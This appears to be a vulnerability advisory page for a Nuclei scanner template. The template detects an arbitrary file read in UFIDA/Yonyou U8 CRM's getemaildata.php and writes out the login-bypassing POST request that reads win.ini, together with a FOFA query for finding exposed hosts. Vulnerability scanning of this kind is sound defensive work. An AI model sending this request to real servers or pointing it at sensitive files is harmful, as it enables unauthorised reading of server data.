漏洞描述
There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
yonyou-u8-crm-lfi: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
PoC代码[已公开]
id: yonyou-u8-crm-lfi
info:
name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: body="用友U8CRM"
tags: yonyou,u8-crm,lfi,vuln
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
condition: and
# digest: 4a0a00473045022100a8537601c94a42d500f3e5e4ba0957326ac11e40d582d42d301103b3b9cb91c60220621d00f76f260e1a0693aae8d874724bf43ee43d908d511808c2528d31e821ea:922c64590222798bb761d5b6d8e72950